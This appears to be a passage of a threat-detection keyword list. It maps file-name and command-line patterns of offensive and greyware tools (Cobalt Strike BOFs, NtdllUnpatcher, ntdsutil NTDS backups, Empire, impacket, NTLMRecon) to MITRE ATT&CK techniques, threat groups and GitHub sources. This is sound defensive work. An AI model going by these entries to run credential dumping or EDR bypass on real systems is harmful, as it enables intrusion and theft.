--datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-cli*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-main*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-v*-universal-macos*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker-v*-x86_64-unknown-linux-gnu*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*Nosql-Exploitation-Framework*,offensive_tool_keyword,Nosql-Exploitation-Framework,A FrameWork For NoSQL Scanning and Exploitation Framework,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Frameworks,https://github.com/torque59/Nosql-Exploitation-Framework,1,1,N/A,N/A,6,594,158,2023-09-26T11:50:30Z,2013-12-26T17:46:11Z -*NoSQLMap*,offensive_tool_keyword,NoSQLMap,Automated NoSQL database enumeration and web application exploitation tool.,T1190 - T1210 - T1506,TA0002 - TA0007 - TA0040,N/A,N/A,Frameworks,https://github.com/codingo/NoSQLMap,1,0,N/A,N/A,10,2532,568,2023-09-29T03:29:49Z,2013-09-24T15:01:30Z -*notepad FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*notredamecheatstowin>*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*novelbfh.zip*,offensive_tool_keyword,novelbfh,Brute force Novell hacking tool -- Circa 1993,T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z -*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*npgimkapccfidfkfoklhpkgmhgfejhbj*,greyware_tool_keyword,BelkaVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nping *,offensive_tool_keyword,nping,Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more,T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://nmap.org/nping/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nps whoami*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*nps whoami*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*nps_payload*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.,T1059.007 - T1218.001 - T1027.002,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/trustedsec/nps_payload,1,1,N/A,N/A,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z -*nps_payload.py*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z -*nps_payload-master*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z -*nrf24-scanner.py -l -v*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nrpc.py*,offensive_tool_keyword,zerologon,Zerologon CVE exploitation,T1210 - T1072,TA0008,N/A,N/A,Exploitation tools,https://github.com/michaelpoznecki/zerologon,1,0,N/A,N/A,1,9,4,2020-09-15T16:31:59Z,2020-09-15T05:32:24Z -*nse_install.py*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nse-insall-0.0.1*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nse-install *,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nse-install-master*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nselib/data/passwords.lst*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ntcreatethread.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ntcreatethread.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*NtCreateUserProcessShellcode*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*ntdissector -*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*ntdissector-main*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*Ntdll_SusProcess.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*NTDLLReflection-main*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*NtdllUnpatcher.cpp*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher.dll*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher.lib*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher.log*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher.obj*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher.sln*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher_Injector*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*NtdllUnpatcher-master*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*ntds/ntds.py*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*ntds_grabber.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ntdsdump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*NTDSgrab.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ntdsutil *ac i ntds* *create full*\temp*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ntdsutil.exe *ac i ntds*ifm*create full *temp*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ntfs-read.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ntlm.py *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ntlm_info_enumeration.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NTLMChallengeBase64*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NTLMChallengeBase64*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ntlm-info.py*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*ntlmquic.*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*ntlmquic-go*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*ntlmquic-master*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*ntlmrecon *,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,0,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*ntlmrecon.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*ntlmrecon:main*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*ntlmrecon-fromfile.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*NTLMRecon-master*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*ntlmrecon-ranges.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information 